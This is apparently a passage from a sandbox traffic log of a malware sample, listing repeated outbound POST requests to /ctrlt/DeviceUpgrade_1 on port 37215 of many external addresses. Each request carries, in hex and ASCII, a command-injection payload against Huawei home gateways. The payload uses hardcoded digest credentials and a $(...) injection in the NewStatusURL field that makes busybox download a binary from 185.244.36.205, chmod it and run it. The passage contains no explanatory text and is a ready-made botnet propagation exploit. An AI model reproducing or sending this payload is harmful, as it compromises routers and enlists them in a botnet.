                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1489192.168.2.1535802157.87.121.8637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643374920 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1490192.168.2.153838445.101.67.25337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643404007 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1491192.168.2.1559070181.149.227.8037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643433094 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1492192.168.2.1537264186.58.146.21937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643435955 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1493192.168.2.153782494.132.157.16637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643455029 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1494192.168.2.155442894.127.32.24437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643476963 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1495192.168.2.154175437.124.90.6237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643495083 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1496192.168.2.153984841.47.236.19237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643501043 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1497192.168.2.153443441.204.41.12437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643538952 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1498192.168.2.1544212190.186.34.8837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643560886 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1499192.168.2.1538730222.125.245.037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.643572092 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
